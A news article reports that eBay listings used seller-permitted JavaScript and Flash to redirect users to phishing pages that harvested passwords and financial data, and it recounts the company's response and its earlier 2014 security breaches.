Online auction giant eBay is in hot water following a report by the BBC that dozens of listings on the site have been used to con shoppers into surrendering private information. According to the news service, the listings automatically redirect users to malicious Web sites as part of a password harvesting scam.

Users have complained of being locked out of their accounts because they have been hijacked by scammers. Some have also been charged fees by the company for sales they claimed they never made.

eBay Aware Since February

eBay removed several posts as a result of the stories, and said that it would continue to review site content for malicious postings. However, the company told the BBC that it viewed the vulnerability as an isolated incident, saying that hackers “intentionally adapt their code and tactics to try to stay ahead of the most sophisticated security Relevant Products/Services systems.”

Although eBay said it moved quickly to address complaints of the flaw once it became aware of it, the BBC said it spoke with users who have been complaining about the vulnerability to eBay since at least February. The news service found 64 listings posted in the last 15 days that could pose threats to users.

The sites appear to be part of a phishing scheme designed to harvest eBay users’ personal data Relevant Products/Services such as bank accounts, credit card numbers, and passwords. However, the sites could potentially expose users to even greater threats, such as infecting their computers with malware. The company maintained that this type of security problem is not a new one for services like eBay.

Cross-Site Scripting Exploit

The exploit seems to stem from eBay’s policy of allowing sellers to use Flash and Javascript in their listings to create so-called “active” content. Both technologies are vulnerable to cross-site scripting attacks that transfer users from the sites they intend to use to phishing pages where they are asked to re-enter their credentials.

"Many of our sellers use active content like Javascript and Flash to make their eBay listings more attractive,” a spokesperson for eBay told the BBC on Friday. “However, we are aware that active content may also be used in abusive ways."

The exploit is only the latest in a series of security issues that have plagued the online retailer this year. In May, hackers managed to steal private data from 145 million eBay users, including passwords, addresses and other information. The company was criticized at the time for its slow response to the attack Relevant Products/Services.

In June, eBay’s event ticket reseller platform, StubHub, was attacked by hackers who managed to harvest login information to steal top-line event tickets and sell them for a profit. That attack was said to have generated more than $1 million for the hackers.